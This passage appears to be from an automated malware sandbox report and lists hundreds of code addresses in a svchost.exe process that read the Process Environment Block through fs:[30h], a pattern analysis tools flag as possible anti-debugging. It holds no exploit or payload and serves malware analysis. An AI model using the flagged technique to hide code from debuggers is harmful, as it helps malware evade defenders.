                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E47A0 mov eax, dword ptr fs:[00000030h]8_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393C7C0 mov eax, dword ptr fs:[00000030h]8_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B07C3 mov eax, dword ptr fs:[00000030h]8_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039347FB mov eax, dword ptr fs:[00000030h]8_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039347FB mov eax, dword ptr fs:[00000030h]8_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039527ED mov eax, dword ptr fs:[00000030h]8_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039527ED mov eax, dword ptr fs:[00000030h]8_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039527ED mov eax, dword ptr fs:[00000030h]8_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BE7E1 mov eax, dword ptr fs:[00000030h]8_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930710 mov eax, dword ptr fs:[00000030h]8_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03960710 mov eax, dword ptr fs:[00000030h]8_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C700 mov eax, dword ptr fs:[00000030h]8_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396273C mov eax, dword ptr fs:[00000030h]8_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396273C mov ecx, dword ptr fs:[00000030h]8_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396273C mov eax, dword ptr fs:[00000030h]8_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AC730 mov eax, dword ptr fs:[00000030h]8_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C720 mov eax, dword ptr fs:[00000030h]8_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C720 mov eax, dword ptr fs:[00000030h]8_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930750 mov eax, dword ptr fs:[00000030h]8_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BE75D mov eax, dword ptr fs:[00000030h]8_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972750 mov eax, dword ptr fs:[00000030h]8_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972750 mov eax, dword ptr fs:[00000030h]8_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B4755 mov eax, dword ptr fs:[00000030h]8_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396674D mov esi, dword ptr fs:[00000030h]8_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396674D mov eax, dword ptr fs:[00000030h]8_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396674D mov eax, dword ptr fs:[00000030h]8_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938770 mov eax, dword ptr fs:[00000030h]8_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940770 mov eax, dword ptr fs:[00000030h]8_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934690 mov eax, dword ptr fs:[00000030h]8_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934690 mov eax, dword ptr fs:[00000030h]8_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039666B0 mov eax, dword ptr fs:[00000030h]8_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C6A6 mov eax, dword ptr fs:[00000030h]8_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A6C7 mov eax, dword ptr fs:[00000030h]8_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE6F2 mov eax, dword ptr fs:[00000030h]8_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE6F2 mov eax, dword ptr fs:[00000030h]8_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE6F2 mov eax, dword ptr fs:[00000030h]8_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE6F2 mov eax, dword ptr fs:[00000030h]8_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B06F1 mov eax, dword ptr fs:[00000030h]8_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B06F1 mov eax, dword ptr fs:[00000030h]8_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972619 mov eax, dword ptr fs:[00000030h]8_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE609 mov eax, dword ptr fs:[00000030h]8_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394260B mov eax, dword ptr fs:[00000030h]8_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394260B mov eax, dword ptr fs:[00000030h]8_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394260B mov eax, dword ptr fs:[00000030h]8_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394260B mov eax, dword ptr fs:[00000030h]8_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394260B mov eax, dword ptr fs:[00000030h]8_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394260B mov eax, dword ptr fs:[00000030h]8_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394260B mov eax, dword ptr fs:[00000030h]8_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E627 mov eax, dword ptr fs:[00000030h]8_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03966620 mov eax, dword ptr fs:[00000030h]8_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03968620 mov eax, dword ptr fs:[00000030h]8_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393262C mov eax, dword ptr fs:[00000030h]8_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394C640 mov eax, dword ptr fs:[00000030h]8_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03962674 mov eax, dword ptr fs:[00000030h]8_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F866E mov eax, dword ptr fs:[00000030h]8_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F866E mov eax, dword ptr fs:[00000030h]8_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A660 mov eax, dword ptr fs:[00000030h]8_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A660 mov eax, dword ptr fs:[00000030h]8_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E59C mov eax, dword ptr fs:[00000030h]8_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03932582 mov eax, dword ptr fs:[00000030h]8_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03932582 mov ecx, dword ptr fs:[00000030h]8_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03964588 mov eax, dword ptr fs:[00000030h]8_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039545B1 mov eax, dword ptr fs:[00000030h]8_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039545B1 mov eax, dword ptr fs:[00000030h]8_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B05A7 mov eax, dword ptr fs:[00000030h]8_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B05A7 mov eax, dword ptr fs:[00000030h]8_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B05A7 mov eax, dword ptr fs:[00000030h]8_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039365D0 mov eax, dword ptr fs:[00000030h]8_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A5D0 mov eax, dword ptr fs:[00000030h]8_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A5D0 mov eax, dword ptr fs:[00000030h]8_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E5CF mov eax, dword ptr fs:[00000030h]8_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E5CF mov eax, dword ptr fs:[00000030h]8_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E5E7 mov eax, dword ptr fs:[00000030h]8_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039325E0 mov eax, dword ptr fs:[00000030h]8_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C5ED mov eax, dword ptr fs:[00000030h]8_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396C5ED mov eax, dword ptr fs:[00000030h]8_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C6500 mov eax, dword ptr fs:[00000030h]8_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04500 mov eax, dword ptr fs:[00000030h]8_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04500 mov eax, dword ptr fs:[00000030h]8_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04500 mov eax, dword ptr fs:[00000030h]8_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04500 mov eax, dword ptr fs:[00000030h]8_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04500 mov eax, dword ptr fs:[00000030h]8_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04500 mov eax, dword ptr fs:[00000030h]8_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04500 mov eax, dword ptr fs:[00000030h]8_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940535 mov eax, dword ptr fs:[00000030h]8_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940535 mov eax, dword ptr fs:[00000030h]8_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940535 mov eax, dword ptr fs:[00000030h]8_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940535 mov eax, dword ptr fs:[00000030h]8_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940535 mov eax, dword ptr fs:[00000030h]8_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940535 mov eax, dword ptr fs:[00000030h]8_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E53E mov eax, dword ptr fs:[00000030h]8_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E53E mov eax, dword ptr fs:[00000030h]8_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E53E mov eax, dword ptr fs:[00000030h]8_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E53E mov eax, dword ptr fs:[00000030h]8_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395E53E mov eax, dword ptr fs:[00000030h]8_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938550 mov eax, dword ptr fs:[00000030h]8_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938550 mov eax, dword ptr fs:[00000030h]8_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396656A mov eax, dword ptr fs:[00000030h]8_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396656A mov eax, dword ptr fs:[00000030h]8_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396656A mov eax, dword ptr fs:[00000030h]8_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EA49A mov eax, dword ptr fs:[00000030h]8_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039644B0 mov ecx, dword ptr fs:[00000030h]8_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BA4B0 mov eax, dword ptr fs:[00000030h]8_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039364AB mov eax, dword ptr fs:[00000030h]8_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039304E5 mov ecx, dword ptr fs:[00000030h]8_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03968402 mov eax, dword ptr fs:[00000030h]8_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03968402 mov eax, dword ptr fs:[00000030h]8_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03968402 mov eax, dword ptr fs:[00000030h]8_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A430 mov eax, dword ptr fs:[00000030h]8_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E420 mov eax, dword ptr fs:[00000030h]8_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E420 mov eax, dword ptr fs:[00000030h]8_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E420 mov eax, dword ptr fs:[00000030h]8_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C427 mov eax, dword ptr fs:[00000030h]8_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6420 mov eax, dword ptr fs:[00000030h]8_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6420 mov eax, dword ptr fs:[00000030h]8_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6420 mov eax, dword ptr fs:[00000030h]8_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6420 mov eax, dword ptr fs:[00000030h]8_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6420 mov eax, dword ptr fs:[00000030h]8_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6420 mov eax, dword ptr fs:[00000030h]8_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6420 mov eax, dword ptr fs:[00000030h]8_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EA456 mov eax, dword ptr fs:[00000030h]8_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392645D mov eax, dword ptr fs:[00000030h]8_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395245A mov eax, dword ptr fs:[00000030h]8_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E443 mov eax, dword ptr fs:[00000030h]8_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395A470 mov eax, dword ptr fs:[00000030h]8_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395A470 mov eax, dword ptr fs:[00000030h]8_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395A470 mov eax, dword ptr fs:[00000030h]8_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BC460 mov ecx, dword ptr fs:[00000030h]8_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940BBE mov eax, dword ptr fs:[00000030h]8_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940BBE mov eax, dword ptr fs:[00000030h]8_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E4BB0 mov eax, dword ptr fs:[00000030h]8_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E4BB0 mov eax, dword ptr fs:[00000030h]8_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DEBD0 mov eax, dword ptr fs:[00000030h]8_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03950BCB mov eax, dword ptr fs:[00000030h]8_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03950BCB mov eax, dword ptr fs:[00000030h]8_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03950BCB mov eax, dword ptr fs:[00000030h]8_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930BCD mov eax, dword ptr fs:[00000030h]8_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930BCD mov eax, dword ptr fs:[00000030h]8_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930BCD mov eax, dword ptr fs:[00000030h]8_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938BF0 mov eax, dword ptr fs:[00000030h]8_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938BF0 mov eax, dword ptr fs:[00000030h]8_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938BF0 mov eax, dword ptr fs:[00000030h]8_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395EBFC mov eax, dword ptr fs:[00000030h]8_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BCBF0 mov eax, dword ptr fs:[00000030h]8_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AEB1D mov eax, dword ptr fs:[00000030h]8_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04B00 mov eax, dword ptr fs:[00000030h]8_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395EB20 mov eax, dword ptr fs:[00000030h]8_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395EB20 mov eax, dword ptr fs:[00000030h]8_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F8B28 mov eax, dword ptr fs:[00000030h]8_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F8B28 mov eax, dword ptr fs:[00000030h]8_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928B50 mov eax, dword ptr fs:[00000030h]8_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DEB50 mov eax, dword ptr fs:[00000030h]8_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E4B4B mov eax, dword ptr fs:[00000030h]8_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E4B4B mov eax, dword ptr fs:[00000030h]8_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C6B40 mov eax, dword ptr fs:[00000030h]8_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C6B40 mov eax, dword ptr fs:[00000030h]8_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FAB40 mov eax, dword ptr fs:[00000030h]8_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D8B42 mov eax, dword ptr fs:[00000030h]8_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392CB7E mov eax, dword ptr fs:[00000030h]8_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A02B57 mov eax, dword ptr fs:[00000030h]8_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A02B57 mov eax, dword ptr fs:[00000030h]8_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A02B57 mov eax, dword ptr fs:[00000030h]8_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A02B57 mov eax, dword ptr fs:[00000030h]8_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03968A90 mov edx, dword ptr fs:[00000030h]8_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA80 mov eax, dword ptr fs:[00000030h]8_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04A80 mov eax, dword ptr fs:[00000030h]8_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938AA0 mov eax, dword ptr fs:[00000030h]8_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03938AA0 mov eax, dword ptr fs:[00000030h]8_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03986AA4 mov eax, dword ptr fs:[00000030h]8_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930AD0 mov eax, dword ptr fs:[00000030h]8_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03964AD0 mov eax, dword ptr fs:[00000030h]8_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03964AD0 mov eax, dword ptr fs:[00000030h]8_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03986ACC mov eax, dword ptr fs:[00000030h]8_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03986ACC mov eax, dword ptr fs:[00000030h]8_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03986ACC mov eax, dword ptr fs:[00000030h]8_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396AAEE mov eax, dword ptr fs:[00000030h]8_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396AAEE mov eax, dword ptr fs:[00000030h]8_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BCA11 mov eax, dword ptr fs:[00000030h]8_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03954A35 mov eax, dword ptr fs:[00000030h]8_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03954A35 mov eax, dword ptr fs:[00000030h]8_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396CA38 mov eax, dword ptr fs:[00000030h]8_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396CA24 mov eax, dword ptr fs:[00000030h]8_2_0396CA24
